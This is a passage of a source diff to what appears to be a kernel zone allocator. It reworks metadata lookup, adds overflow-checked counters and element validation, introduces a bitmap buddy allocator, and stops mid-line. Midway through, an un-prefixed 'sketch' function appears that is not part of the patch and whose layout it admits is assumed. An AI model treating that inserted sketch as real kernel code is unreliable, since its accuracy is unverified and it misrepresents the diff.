 zone_accounting_panic(zone_t zone, const char *kind)
@@ -562,6 +762,52 @@ zone_accounting_panic(zone_t zone, const char *kind)
            zone_heap_name(zone), zone->z_name);
 }
 
+#define zone_counter_sub(z, stat, value)  ({ \
+       if (os_sub_overflow((z)->stat, value, &(z)->stat)) { \
+           zone_accounting_panic(z, #stat " wrap-around"); \
+       } \
+       (z)->stat; \
+})
+
+static inline void
+zone_elems_free_add(zone_t z, uint32_t count)
+{
+       uint32_t n = (z->z_elems_free += count);
+       if (z->z_elems_free_max < n) {
+               z->z_elems_free_max = n;
+       }
+}
+
+static inline void
+zone_elems_free_sub(zone_t z, uint32_t count)
+{
+       uint32_t n = zone_counter_sub(z, z_elems_free, count);
+
+       if (z->z_elems_free_min > n) {
+               z->z_elems_free_min = n;
+       }
+}
+
+static inline uint16_t
+zone_meta_alloc_size_add(zone_t z, struct zone_page_metadata *m,
+    vm_offset_t esize)
+{
+       if (os_add_overflow(m->zm_alloc_size, (uint16_t)esize, &m->zm_alloc_size)) {
+               zone_page_meta_accounting_panic(z, m, "alloc_size wrap-around");
+       }
+       return m->zm_alloc_size;
+}
+
+static inline uint16_t
+zone_meta_alloc_size_sub(zone_t z, struct zone_page_metadata *m,
+    vm_offset_t esize)
+{
+       if (os_sub_overflow(m->zm_alloc_size, esize, &m->zm_alloc_size)) {
+               zone_page_meta_accounting_panic(z, m, "alloc_size wrap-around");
+       }
+       return m->zm_alloc_size;
+}
+
 __abortlike
 static void
 zone_nofail_panic(zone_t zone)
@@ -603,21 +849,15 @@ zone_range_size(const struct zone_map_range *r)
        return rmax - rmin;
 }
 
-#define from_zone_map(addr, size) \
-       zone_range_contains(&zone_info.zi_map_range, (vm_offset_t)(addr), size)
-
-#define from_general_submap(addr, size) \
-       zone_range_contains(&zone_info.zi_general_range, (vm_offset_t)(addr), size)
+#define from_zone_map(addr, size, kind) \
+       zone_range_contains(&zone_info.zi_map_range[kind], \
+           (vm_offset_t)(addr), size)
 
-#define from_foreign_range(addr, size) \
-       zone_range_contains(&zone_info.zi_foreign_range, (vm_offset_t)(addr), size)
+#define zone_native_size() \
+       zone_range_size(&zone_info.zi_map_range[ZONE_ADDR_NATIVE])
 
-#define from_native_meta_map(addr) \
-       zone_range_contains(&zone_info.zi_meta_range, (vm_offset_t)(addr), \
-           sizeof(struct zone_page_metadata))
-
-#define zone_addr_kind(addr, size) \
-       (from_zone_map(addr, size) ? ZONE_ADDR_NATIVE : ZONE_ADDR_FOREIGN)
+#define zone_foreign_size() \
+       zone_range_size(&zone_info.zi_map_range[ZONE_ADDR_FOREIGN])
 
 __header_always_inline bool
 zone_pva_is_null(zone_pva_t page)
@@ -663,6 +903,12 @@ zone_pva_from_addr(vm_address_t addr)
        return (zone_pva_t){ (uint32_t)((intptr_t)addr >> PAGE_SHIFT) };
 }
 
+__header_always_inline zone_pva_t
+zone_pva_from_element(zone_element_t ze)
+{
+       return zone_pva_from_addr(ze.ze_value);
+}
+
 __header_always_inline vm_address_t
 zone_pva_to_addr(zone_pva_t page)
 {
@@ -671,52 +917,44 @@ zone_pva_to_addr(zone_pva_t page)
 }
 
 __header_always_inline struct zone_page_metadata *
-zone_pva_to_meta(zone_pva_t page, zone_addr_kind_t kind)
+zone_pva_to_meta(zone_pva_t page)
 {
-       if (kind == ZONE_ADDR_NATIVE) {
-               return &zone_info.zi_array_base[page.packed_address];
-       } else {
-               return (struct zone_page_metadata *)zone_pva_to_addr(page);
-       }
+       return &zone_info.zi_meta_base[page.packed_address];
 }
 
 __header_always_inline zone_pva_t
-zone_pva_from_meta(struct zone_page_metadata *meta, zone_addr_kind_t kind)
+zone_pva_from_meta(struct zone_page_metadata *meta)
 {
-       if (kind == ZONE_ADDR_NATIVE) {
-               uint32_t index = (uint32_t)(meta - zone_info.zi_array_base);
-               return (zone_pva_t){ index };
-       } else {
-               return zone_pva_from_addr((vm_address_t)meta);
-       }
+       return (zone_pva_t){ (uint32_t)(meta - zone_info.zi_meta_base) };
 }
 
 __header_always_inline struct zone_page_metadata *
-zone_meta_from_addr(vm_offset_t addr, zone_addr_kind_t kind)
+zone_meta_from_addr(vm_offset_t addr)
 {
-       if (kind == ZONE_ADDR_NATIVE) {
-               return zone_pva_to_meta(zone_pva_from_addr(addr), kind);
-       } else {
-               return (struct zone_page_metadata *)trunc_page(addr);
-       }
+       return zone_pva_to_meta(zone_pva_from_addr(addr));
+}
+
+__header_always_inline struct zone_page_metadata *
+zone_meta_from_element(zone_element_t ze)
+{
+       return zone_pva_to_meta(zone_pva_from_element(ze));
 }
 
-#define zone_native_meta_from_addr(addr) \
-       zone_meta_from_addr((vm_offset_t)(addr), ZONE_ADDR_NATIVE)
+__header_always_inline zone_id_t
+zone_index_from_ptr(const void *ptr)
+{
+       return zone_pva_to_meta(zone_pva_from_addr((vm_offset_t)ptr))->zm_index;
+}
 
 __header_always_inline vm_offset_t
-zone_meta_to_addr(struct zone_page_metadata *meta, zone_addr_kind_t kind)
+zone_meta_to_addr(struct zone_page_metadata *meta)
 {
-       if (kind == ZONE_ADDR_NATIVE) {
-               return ptoa((int)(meta - zone_info.zi_array_base));
-       } else {
-               return (vm_offset_t)meta;
-       }
+       return ptoa((int32_t)(meta - zone_info.zi_meta_base));
 }
 
 __header_always_inline void
 zone_meta_queue_push(zone_t z, zone_pva_t *headp,
-    struct zone_page_metadata *meta, zone_addr_kind_t kind)
+    struct zone_page_metadata *meta)
 {
        zone_pva_t head = *headp;
        zone_pva_t queue_pva = zone_queue_encode(headp);
@@ -724,34 +962,30 @@ zone_meta_queue_push(zone_t z, zone_pva_t *headp,
 
        meta->zm_page_next = head;
        if (!zone_pva_is_null(head)) {
-               tmp = zone_pva_to_meta(head, kind);
+               tmp = zone_pva_to_meta(head);
                if (!zone_pva_is_equal(tmp->zm_page_prev, queue_pva)) {
                        zone_page_metadata_list_corruption(z, meta);
                }
-               tmp->zm_page_prev = zone_pva_from_meta(meta, kind);
+               tmp->zm_page_prev = zone_pva_from_meta(meta);
        }
        meta->zm_page_prev = queue_pva;
-       *headp = zone_pva_from_meta(meta, kind);
+       *headp = zone_pva_from_meta(meta);
 }
 
 __header_always_inline struct zone_page_metadata *
-zone_meta_queue_pop(zone_t z, zone_pva_t *headp, zone_addr_kind_t kind,
-    vm_offset_t *page_addrp)
+zone_meta_queue_pop_native(zone_t z, zone_pva_t *headp, vm_offset_t *page_addrp)
 {
        zone_pva_t head = *headp;
-       struct zone_page_metadata *meta = zone_pva_to_meta(head, kind);
+       struct zone_page_metadata *meta = zone_pva_to_meta(head);
        vm_offset_t page_addr = zone_pva_to_addr(head);
        struct zone_page_metadata *tmp;
 
-       if (kind == ZONE_ADDR_NATIVE && !from_native_meta_map(meta)) {
+       if (!from_zone_map(page_addr, 1, ZONE_ADDR_NATIVE)) {
                zone_page_metadata_native_queue_corruption(z, headp);
        }
-       if (kind == ZONE_ADDR_FOREIGN && from_zone_map(meta, sizeof(*meta))) {
-               zone_page_metadata_foreign_queue_corruption(z, headp);
-       }
 
        if (!zone_pva_is_null(meta->zm_page_next)) {
-               tmp = zone_pva_to_meta(meta->zm_page_next, kind);
+               tmp = zone_pva_to_meta(meta->zm_page_next);
                if (!zone_pva_is_equal(tmp->zm_page_prev, head)) {
                        zone_page_metadata_list_corruption(z, meta);
                }
@@ -759,19 +993,24 @@ zone_meta_queue_pop(zone_t z, zone_pva_t *headp, zone_addr_kind_t kind,
        }
        *headp = meta->zm_page_next;
 
+       meta->zm_page_next = meta->zm_page_prev = (zone_pva_t){ 0 };
        *page_addrp = page_addr;
+
+       if (!zone_has_index(z, meta->zm_index)) {
+               zone_page_metadata_index_confusion_panic(z,
+                   zone_meta_to_addr(meta), meta);
+       }
        return meta;
 }
 
 __header_always_inline void
-zone_meta_requeue(zone_t z, zone_pva_t *headp,
-    struct zone_page_metadata *meta, zone_addr_kind_t kind)
+zone_meta_remqueue(zone_t z, struct zone_page_metadata *meta)
 {
-       zone_pva_t meta_pva = zone_pva_from_meta(meta, kind);
+       zone_pva_t meta_pva = zone_pva_from_meta(meta);
        struct zone_page_metadata *tmp;
 
        if (!zone_pva_is_null(meta->zm_page_next)) {
-               tmp = zone_pva_to_meta(meta->zm_page_next, kind);
+               tmp = zone_pva_to_meta(meta->zm_page_next);
                if (!zone_pva_is_equal(tmp->zm_page_prev, meta_pva)) {
                        zone_page_metadata_list_corruption(z, meta);
                }
@@ -780,14 +1019,48 @@ zone_meta_requeue(zone_t z, zone_pva_t *headp,
        if (zone_pva_is_queue(meta->zm_page_prev)) {
                zone_queue_set_head(z, meta->zm_page_prev, meta_pva, meta);
        } else {
-               tmp = zone_pva_to_meta(meta->zm_page_prev, kind);
+               tmp = zone_pva_to_meta(meta->zm_page_prev);
                if (!zone_pva_is_equal(tmp->zm_page_next, meta_pva)) {
                        zone_page_metadata_list_corruption(z, meta);
                }
                tmp->zm_page_next = meta->zm_page_next;
        }
 
-       zone_meta_queue_push(z, headp, meta, kind);
+       meta->zm_page_next = meta->zm_page_prev = (zone_pva_t){ 0 };
+}
+
+__header_always_inline void
+zone_meta_requeue(zone_t z, zone_pva_t *headp,
+    struct zone_page_metadata *meta)
+{
+       zone_meta_remqueue(z, meta);
+       zone_meta_queue_push(z, headp, meta);
+}
+
+/* prevents a given metadata from ever reaching the z_pageq_empty queue */
+static inline void
+zone_meta_lock_in_partial(zone_t z, struct zone_page_metadata *m, uint32_t len)
+{
+       uint16_t new_size = zone_meta_alloc_size_add(z, m, ZM_ALLOC_SIZE_LOCK);
+
+       assert(new_size % sizeof(vm_offset_t) == ZM_ALLOC_SIZE_LOCK);
+       if (new_size == ZM_ALLOC_SIZE_LOCK) {
+               zone_meta_requeue(z, &z->z_pageq_partial, m);
+               zone_counter_sub(z, z_wired_empty, len);
+       }
+}
+
+/* allows a given metadata to reach the z_pageq_empty queue again */
+static inline void
+zone_meta_unlock_from_partial(zone_t z, struct zone_page_metadata *m, uint32_t len)
+{
+       uint16_t new_size = zone_meta_alloc_size_sub(z, m, ZM_ALLOC_SIZE_LOCK);
+
+       assert(new_size % sizeof(vm_offset_t) == 0);
+       if (new_size == 0) {
+               zone_meta_requeue(z, &z->z_pageq_empty, m);
+               z->z_wired_empty += len;
+       }
 }
 
 /*
@@ -795,8 +1068,10 @@ zone_meta_requeue(zone_t z, zone_pva_t *headp,
  * Must be called without the zone lock held as it might potentially block.
  */
 static void
-zone_meta_populate(struct zone_page_metadata *from, struct zone_page_metadata *to)
+zone_meta_populate(vm_offset_t base, vm_size_t size)
 {
+       struct zone_page_metadata *from = zone_meta_from_addr(base);
+       struct zone_page_metadata *to   = from + atop(size);
        vm_offset_t page_addr = trunc_page(from);
 
        for (; page_addr < (vm_offset_t)to; page_addr += PAGE_SIZE) {
@@ -838,54 +1113,59 @@ zone_meta_populate(struct zone_page_metadata *from, struct zone_page_metadata *t
        }
 }
 
-static inline bool
-zone_allocated_element_offset_is_valid(zone_t zone, vm_offset_t addr,
-    vm_offset_t page, zone_addr_kind_t kind)
+__header_always_inline
+struct zone_page_metadata *
+zone_element_validate(zone_t zone, zone_element_t ze)
 {
-       vm_offset_t offs = addr - page - ZONE_PAGE_FIRST_OFFSET(kind);
-       vm_offset_t esize = zone_elem_size(zone);
+       struct zone_page_metadata *meta;
+       vm_offset_t page = zone_element_base(ze);
 
-       if (esize & (esize - 1)) { /* not a power of 2 */
-               return (offs % esize) == 0;
-       } else {
-               return (offs & (esize - 1)) == 0;
+       if (!from_zone_map(page, 1, ZONE_ADDR_NATIVE) &&
+           !from_zone_map(page, 1, ZONE_ADDR_FOREIGN)) {
+               zone_invalid_element_panic(zone, ze);
+       }
+       meta = zone_meta_from_addr(page);
+
+       if (meta->zm_chunk_len > ZM_CHUNK_LEN_MAX) {
+               zone_invalid_element_panic(zone, ze);
+       }
+       if (zone_element_idx(ze) >= zone->z_chunk_elems) {
+               zone_invalid_element_panic(zone, ze);
+       }
+
+       if (!zone_has_index(zone, meta->zm_index)) {
+               vm_offset_t addr = zone_element_addr(ze, zone_elem_size(zone));
+               zone_page_metadata_index_confusion_panic(zone, addr, meta);
        }
+
+       return meta;
 }
 
 __attribute__((always_inline))
 static struct zone_page_metadata *
-zone_allocated_element_resolve(zone_t zone, vm_offset_t addr,
-    vm_offset_t *pagep, zone_addr_kind_t *kindp)
+zone_element_resolve(zone_t zone, vm_offset_t addr, vm_offset_t esize,
+    zone_element_t *ze)
 {
        struct zone_page_metadata *meta;
-       zone_addr_kind_t kind;
-       vm_offset_t page;
-       vm_offset_t esize = zone_elem_size(zone);
+       vm_offset_t page, eidx;
 
-       kind = zone_addr_kind(addr, esize);
+       if (!from_zone_map(addr, esize, ZONE_ADDR_NATIVE) &&
+           !from_zone_map(addr, esize, ZONE_ADDR_FOREIGN)) {
+               zone_invalid_element_addr_panic(zone, addr);
+       }
        page = trunc_page(addr);
-       meta = zone_meta_from_addr(addr, kind);
+       meta = zone_meta_from_addr(addr);
 
-       if (kind == ZONE_ADDR_NATIVE) {
-               if (meta->zm_secondary_page) {
-                       if (meta->zm_percpu) {
-                               zone_invalid_element_addr_panic(zone, addr);
-                       }
-                       page -= ptoa(meta->zm_page_count);
-                       meta -= meta->zm_page_count;
-               }
-       } else if (!zone->allows_foreign) {
-               zone_page_metadata_foreign_confusion_panic(zone, addr);
-#if __LP64__
-       } else if (!from_foreign_range(addr, esize)) {
-               zone_invalid_foreign_addr_panic(zone, addr);
-#else
-       } else if (!pmap_kernel_va(addr)) {
+       if (meta->zm_chunk_len == ZM_SECONDARY_PCPU_PAGE) {
                zone_invalid_element_addr_panic(zone, addr);
-#endif
+       }
+       if (meta->zm_chunk_len == ZM_SECONDARY_PAGE) {
+               page -= ptoa(meta->zm_page_index);
+               meta -= meta->zm_page_index;
        }
 
-       if (!zone_allocated_element_offset_is_valid(zone, addr, page, kind)) {
+       eidx = (addr - page) / esize;
+       if ((addr - page) % esize) {
                zone_invalid_element_addr_panic(zone, addr);
        }
 
@@ -893,86 +1173,27 @@ zone_allocated_element_resolve(zone_t zone, vm_offset_t addr,
                zone_page_metadata_index_confusion_panic(zone, addr, meta);
        }
 
-       if (kindp) {
-               *kindp = kind;
-       }
-       if (pagep) {
-               *pagep = page;
-       }
+       *ze = zone_element_encode(page, eidx, ZPM_AUTO);
        return meta;
 }
 
-__attribute__((always_inline))
-void
-zone_allocated_element_validate(zone_t zone, vm_offset_t addr)
-{
-       zone_allocated_element_resolve(zone, addr, NULL, NULL);
-}
-
-__header_always_inline vm_offset_t
-zone_page_meta_get_freelist(zone_t zone, struct zone_page_metadata *meta,
-    vm_offset_t page)
-{
-       assert(!meta->zm_secondary_page);
-       if (meta->zm_freelist_offs == PAGE_METADATA_EMPTY_FREELIST) {
-               return 0;
-       }
-
-       vm_size_t size = ptoa(meta->zm_percpu ? 1 : meta->zm_page_count);
-       if (meta->zm_freelist_offs + zone_elem_size(zone) > size) {
-               zone_metadata_corruption(zone, meta, "freelist corruption");
-       }
-
-       return page + meta->zm_freelist_offs;
-}
-
-__header_always_inline void
-zone_page_meta_set_freelist(struct zone_page_metadata *meta,
-    vm_offset_t page, vm_offset_t addr)
-{
-       assert(!meta->zm_secondary_page);
-       if (addr) {
-               meta->zm_freelist_offs = (uint16_t)(addr - page);
-       } else {
-               meta->zm_freelist_offs = PAGE_METADATA_EMPTY_FREELIST;
-       }
-}
-
-static bool
-zone_page_meta_is_sane_element(zone_t zone, struct zone_page_metadata *meta,
-    vm_offset_t page, vm_offset_t element, zone_addr_kind_t kind)
-{
-       if (element == 0) {
-               /* ends of the freelist are NULL */
-               return true;
-       }
-       if (element < page + ZONE_PAGE_FIRST_OFFSET(kind)) {
-               return false;
-       }
-       vm_size_t size = ptoa(meta->zm_percpu ? 1 : meta->zm_page_count);
-       if (element > page + size - zone_elem_size(zone)) {
-               return false;
-       }
-       return true;
-}
-
 /* Routine to get the size of a zone allocated address.
  * If the address doesn't belong to the zone maps, returns 0.
  */
 vm_size_t
 zone_element_size(void *addr, zone_t *z)
 {
-       struct zone_page_metadata *meta;
        struct zone *src_zone;
 
-       if (from_zone_map(addr, sizeof(void *))) {
-               meta = zone_native_meta_from_addr(addr);
-               src_zone = &zone_array[meta->zm_index];
+       if (from_zone_map(addr, sizeof(void *), ZONE_ADDR_NATIVE) ||
+           from_zone_map(addr, sizeof(void *), ZONE_ADDR_FOREIGN)) {
+               src_zone = &zone_array[zone_index_from_ptr(addr)];
                if (z) {
                        *z = src_zone;
                }
                return zone_elem_size(src_zone);
        }
+
 #if CONFIG_GZALLOC
        if (__improbable(gzalloc_enabled())) {
                vm_size_t gzsize;
@@ -993,11 +1214,11 @@ zone_require_panic(zone_t zone, void *addr)
        uint32_t zindex;
        zone_t other;
 
-       if (!from_zone_map(addr, zone_elem_size(zone))) {
+       if (!from_zone_map(addr, zone_elem_size(zone), ZONE_ADDR_NATIVE)) {
                panic("zone_require failed: address not in a zone (addr: %p)", addr);
        }
 
-       zindex = zone_native_meta_from_addr(addr)->zm_index;
+       zindex = zone_index_from_ptr(addr);
        other = &zone_array[zindex];
        if (zindex >= os_atomic_load(&num_zones, relaxed) || !other->z_self) {
                panic("zone_require failed: invalid zone index %d "
@@ -1031,5116 +1252,7322 @@ zone_id_require_panic(zone_id_t zid, void *addr)
 void
 zone_require(zone_t zone, void *addr)
 {
-       if (__probable(from_general_submap(addr, zone_elem_size(zone)) &&
-           (zone_has_index(zone, zone_native_meta_from_addr(addr)->zm_index)))) {
-               return;
-       }
+       vm_size_t esize = zone_elem_size(zone);
+
+       if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE))) {
+               if (zone_has_index(zone, zone_index_from_ptr(addr))) {
+                       return;
+               }
 #if CONFIG_GZALLOC
-       if (__probable(gzalloc_enabled())) {
+       } else if (__probable(zone->gzalloc_tracked)) {
                return;
-       }
 #endif
+       }
        zone_require_panic(zone, addr);
 }
 
 void
 zone_id_require(zone_id_t zid, vm_size_t esize, void *addr)
 {
-       if (__probable(from_general_submap(addr, esize) &&
-           (zid == zone_native_meta_from_addr(addr)->zm_index))) {
+       if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE))) {
+               if (zid == zone_index_from_ptr(addr)) {
+                       return;
+               }
+#if CONFIG_GZALLOC
+       } else if (__probable(zone_array[zid].gzalloc_tracked)) {
                return;
+#endif
        }
+       zone_id_require_panic(zid, addr);
+}
+
+void
+zone_id_require_allow_foreign(zone_id_t zid, vm_size_t esize, void *addr)
+{
+       if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE) ||
+           from_zone_map(addr, esize, ZONE_ADDR_FOREIGN))) {
+               if (zid == zone_index_from_ptr(addr)) {
+                       return;
+               }
 #if CONFIG_GZALLOC
-       if (__probable(gzalloc_enabled())) {
+       } else if (__probable(zone_array[zid].gzalloc_tracked)) {
                return;
-       }
 #endif
+       }
        zone_id_require_panic(zid, addr);
 }
 
 bool
 zone_owns(zone_t zone, void *addr)
 {
-       if (__probable(from_general_submap(addr, zone_elem_size(zone)) &&
-           (zone_has_index(zone, zone_native_meta_from_addr(addr)->zm_index)))) {
-               return true;
-       }
+       vm_size_t esize = zone_elem_size(zone);
+
+       if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE))) {
+               return zone_has_index(zone, zone_index_from_ptr(addr));
 #if CONFIG_GZALLOC
-       if (__probable(gzalloc_enabled())) {
+       } else if (__probable(zone->gzalloc_tracked)) {
                return true;
-       }
 #endif
+       }
        return false;
 }
 
-#pragma mark ZTAGS
-#if VM_MAX_TAG_ZONES
+#endif /* !ZALLOC_TEST */
+#pragma mark Zone bits allocator
 
-// for zones with tagging enabled:
+/*!
+ * @defgroup Zone Bitmap allocator
+ * @{
+ *
+ * @brief
+ * Functions implementing the zone bitmap allocator
+ *
+ * @discussion
+ * The zone allocator tracks which elements are allocated or free using bitmaps.
+ *
+ * When the number of elements per page is smaller than 32, it is stored inline
+ * on the @c zone_page_metadata structure (@c zm_inline_bitmap is set,
+ * and @c zm_bitmap used for storage).
+ *
+ * When the number of elements is larger, a bitmap is allocated from
+ * a buddy allocator (implemented under the @c zba_* namespace). Pointers
+ * to bitmaps are implemented as a packed 32 bit bitmap reference, stored in
+ * @c zm_bitmap. The low 3 bits encode the scale (order) of the allocation in
+ * @c ZBA_GRANULE units, and hence actual allocations encoded with that scheme
+ * cannot be larger than 1024 bytes (8192 bits).
+ *
+ * This buddy allocator can actually accommodate allocations as large
+ * as 8k on 16k systems and 2k on 4k systems.
+ *
+ * Note: @c zba_* functions are implementation details not meant to be used
+ * outside of the allocation of the allocator itself. Interfaces to the rest of
+ * the zone allocator are documented and not @c zba_* prefixed.
+ */
 
-// calculate a pointer to the tag base entry,
-// holding either a uint32_t the first tag offset for a page in the zone map,
-// or two uint16_t tags if the page can only hold one or two elements
+#define ZBA_CHUNK_SIZE          PAGE_MAX_SIZE
+#define ZBA_GRANULE             sizeof(uint64_t)
+#define ZBA_GRANULE_BITS        (8 * sizeof(uint64_t))
+#define ZBA_MAX_ORDER           (PAGE_MAX_SHIFT - 4)
+#define ZBA_MAX_ALLOC_ORDER     7
+#define ZBA_SLOTS               (ZBA_CHUNK_SIZE / ZBA_GRANULE)
+static_assert(2ul * ZBA_GRANULE << ZBA_MAX_ORDER == ZBA_CHUNK_SIZE, "chunk sizes");
+static_assert(ZBA_MAX_ALLOC_ORDER <= ZBA_MAX_ORDER, "ZBA_MAX_ORDER is enough");
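A sketch of decoding a packed bitmap reference, assuming the bits above the
low three index ZBA_GRANULE-sized slots (the low-3-bits-encode-the-order part
is stated above; the rest of this layout is an assumption for illustration):

static uint64_t *
zba_ref_to_bitmap_sketch(uint64_t *slot_base, uint32_t bref, uint32_t *nbitsp)
{
	uint32_t order = bref & 0x7;

	/* an order-n allocation provides (ZBA_GRANULE_BITS << n) bits */
	*nbitsp = (uint32_t)(ZBA_GRANULE_BITS << order);
	return slot_base + (bref >> 3);
}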
+
+struct zone_bits_chain {
+       uint32_t zbc_next;
+       uint32_t zbc_prev;
+} __attribute__((aligned(ZBA_GRANULE)));
+
+struct zone_bits_head {
+       uint32_t zbh_next;
+       uint32_t zbh_unused;
+} __attribute__((aligned(ZBA_GRANULE)));
+
+static_assert(sizeof(struct zone_bits_chain) == ZBA_GRANULE, "zbc size");
+static_assert(sizeof(struct zone_bits_head) == ZBA_GRANULE, "zbh size");
+
+struct zone_bits_allocator_meta {
+       uint32_t zbam_chunks;
+       uint32_t __zbam_padding;
+       struct zone_bits_head zbam_lists[ZBA_MAX_ORDER + 1];
+};
 
-#define ZTAGBASE(zone, element) \
-    (&((uint32_t *)zone_tagbase_min)[atop((element) - zone_info.zi_map_range.min_address)])
+struct zone_bits_allocator_header {
+       uint64_t zbah_bits[ZBA_SLOTS / (8 * sizeof(uint64_t))];
+};
 
-// pointer to the tag for an element
-#define ZTAG(zone, element)                                     \
-    ({                                                          \
-       vm_tag_t * result;                                      \
-       if ((zone)->tags_inline) {                              \
-           result = (vm_tag_t *) ZTAGBASE((zone), (element));  \
-           if ((page_mask & element) >= zone_elem_size(zone)) result++;    \
-       } else {                                                \
-           result =  &((vm_tag_t *)zone_tags_min)[ZTAGBASE((zone), (element))[0] + ((element) & page_mask) / zone_elem_size((zone))];   \
-       }                                                       \
-       result;                                                 \
-    })
+#if ZALLOC_TEST
+static struct zalloc_bits_allocator_test_setup {
+       vm_offset_t zbats_base;
+       void      (*zbats_populate)(vm_address_t addr, vm_size_t size);
+} zba_test_info;
 
+static struct zone_bits_allocator_header *
+zba_base_header(void)
+{
+       return (struct zone_bits_allocator_header *)zba_test_info.zbats_base;
+}
 
-static vm_offset_t  zone_tagbase_min;
-static vm_offset_t  zone_tagbase_max;
-static vm_offset_t  zone_tagbase_map_size;
-static vm_map_t     zone_tagbase_map;
+static void
+zba_populate(uint32_t n)
+{
+       vm_address_t base = zba_test_info.zbats_base;
+       zba_test_info.zbats_populate(base + n * ZBA_CHUNK_SIZE, ZBA_CHUNK_SIZE);
+}
+#else
+__startup_data
+static uint8_t zba_chunk_startup[ZBA_CHUNK_SIZE]
+__attribute__((aligned(ZBA_CHUNK_SIZE)));
+static LCK_MTX_EARLY_DECLARE(zba_mtx, &zone_locks_grp);
 
-static vm_offset_t  zone_tags_min;
-static vm_offset_t  zone_tags_max;
-static vm_offset_t  zone_tags_map_size;
-static vm_map_t     zone_tags_map;
+static struct zone_bits_allocator_header *
+zba_base_header(void)
+{
+       return (struct zone_bits_allocator_header *)zone_info.zi_bits_range.min_address;
+}
 
-// simple heap allocator for allocating the tags for new memory
+static void
+zba_lock(void)
+{
+       lck_mtx_lock(&zba_mtx);
+}
 
-LCK_MTX_EARLY_DECLARE(ztLock, &zone_locks_grp); /* heap lock */
+static void
+zba_unlock(void)
+{
+       lck_mtx_unlock(&zba_mtx);
+}
 
-enum{
-       ztFreeIndexCount = 8,
-       ztFreeIndexMax   = (ztFreeIndexCount - 1),
-       ztTagsPerBlock   = 4
-};
+static void
+zba_populate(uint32_t n)
+{
+       vm_size_t size = ZBA_CHUNK_SIZE;
+       vm_address_t addr;
 
-struct ztBlock {
-#if __LITTLE_ENDIAN__
-       uint64_t free:1,
-           next:21,
-           prev:21,
-           size:21;
-#else
-// ztBlock needs free bit least significant
-#error !__LITTLE_ENDIAN__
+       addr = zone_info.zi_bits_range.min_address + n * size;
+       if (addr >= zone_info.zi_bits_range.max_address) {
+               zone_t z = zone_find_largest();
+               panic("zba_populate: out of bitmap space, "
+                   "likely due to memory leak in zone [%s%s] "
+                   "(%luM, %d elements allocated)",
+                   zone_heap_name(z), zone_name(z),
+                   (unsigned long)zone_size_wired(z) >> 20,
+                   zone_count_allocated(z));
+       }
+
+       for (;;) {
+               kern_return_t kr = KERN_SUCCESS;
+
+               if (0 == pmap_find_phys(kernel_pmap, addr)) {
+                       kr = kernel_memory_populate(kernel_map, addr, size,
+                           KMA_NOPAGEWAIT | KMA_KOBJECT | KMA_ZERO,
+                           VM_KERN_MEMORY_OSFMK);
+               }
+
+               if (kr == KERN_SUCCESS) {
+                       return;
+               }
+
+               zba_unlock();
+               VM_PAGE_WAIT();
+               zba_lock();
+       }
+}
 #endif
-};
-typedef struct ztBlock ztBlock;
 
-static ztBlock * ztBlocks;
-static uint32_t  ztBlocksCount;
-static uint32_t  ztBlocksFree;
+__pure2
+static struct zone_bits_allocator_meta *
+zba_meta(void)
+{
+       return (struct zone_bits_allocator_meta *)&zba_base_header()[1];
+}
+
+__pure2
+static uint64_t *
+zba_slot_base(void)
+{
+       return (uint64_t *)zba_base_header();
+}
+
+__pure2
+static vm_address_t
+zba_page_addr(uint32_t n)
+{
+       return (vm_address_t)zba_base_header() + n * ZBA_CHUNK_SIZE;
+}
+
+__pure2
+static struct zone_bits_head *
+zba_head(uint32_t order)
+{
+       return &zba_meta()->zbam_lists[order];
+}
 
+__pure2
 static uint32_t
-ztLog2up(uint32_t size)
+zba_head_index(uint32_t order)
 {
-       if (1 == size) {
-               size = 0;
-       } else {
-               size = 32 - __builtin_clz(size - 1);
-       }
-       return size;
+       uint32_t hdr_size = sizeof(struct zone_bits_allocator_header) +
+           offsetof(struct zone_bits_allocator_meta, zbam_lists);
+       return (hdr_size / ZBA_GRANULE) + order;
 }
 
+__pure2
+static struct zone_bits_chain *
+zba_chain_for_index(uint32_t index)
+{
+       return (struct zone_bits_chain *)(zba_slot_base() + index);
+}
+
+__pure2
 static uint32_t
-ztLog2down(uint32_t size)
+zba_chain_to_index(const struct zone_bits_chain *zbc)
 {
-       size = 31 - __builtin_clz(size);
-       return size;
+       return (uint32_t)((const uint64_t *)zbc - zba_slot_base());
 }
 
+__abortlike
 static void
-ztFault(vm_map_t map, const void * address, size_t size, uint32_t flags)
+zba_head_corruption_panic(uint32_t order)
 {
-       vm_map_offset_t addr = (vm_map_offset_t) address;
-       vm_map_offset_t page, end;
+       panic("zone bits allocator head[%d:%p] is corrupt", order,
+           zba_head(order));
+}
 
-       page = trunc_page(addr);
-       end  = round_page(addr + size);
+__abortlike
+static void
+zba_chain_corruption_panic(struct zone_bits_chain *a, struct zone_bits_chain *b)
+{
+       panic("zone bits allocator freelist is corrupt (%p <-> %p)", a, b);
+}
 
-       for (; page < end; page += page_size) {
-               if (!pmap_find_phys(kernel_pmap, page)) {
-                       kern_return_t __unused
-                       ret = kernel_memory_populate(map, page, PAGE_SIZE,
-                           KMA_KOBJECT | flags, VM_KERN_MEMORY_DIAG);
-                       assert(ret == KERN_SUCCESS);
+static void
+zba_push_block(struct zone_bits_chain *zbc, uint32_t order)
+{
+       struct zone_bits_head *hd = zba_head(order);
+       uint32_t hd_index = zba_head_index(order);
+       uint32_t index = zba_chain_to_index(zbc);
+       struct zone_bits_chain *next;
+
+       if (hd->zbh_next) {
+               next = zba_chain_for_index(hd->zbh_next);
+               if (next->zbc_prev != hd_index) {
+                       zba_head_corruption_panic(order);
                }
+               next->zbc_prev = index;
        }
+       zbc->zbc_next = hd->zbh_next;
+       zbc->zbc_prev = hd_index;
+       hd->zbh_next = index;
 }
 
-static boolean_t
-ztPresent(const void * address, size_t size)
+static void
+zba_remove_block(struct zone_bits_chain *zbc)
 {
-       vm_map_offset_t addr = (vm_map_offset_t) address;
-       vm_map_offset_t page, end;
-       boolean_t       result;
+       struct zone_bits_chain *prev = zba_chain_for_index(zbc->zbc_prev);
+       uint32_t index = zba_chain_to_index(zbc);
 
-       page = trunc_page(addr);
-       end  = round_page(addr + size);
-       for (result = TRUE; (page < end); page += page_size) {
-               result = pmap_find_phys(kernel_pmap, page);
-               if (!result) {
-                       break;
+       if (prev->zbc_next != index) {
+               zba_chain_corruption_panic(prev, zbc);
+       }
+       if ((prev->zbc_next = zbc->zbc_next)) {
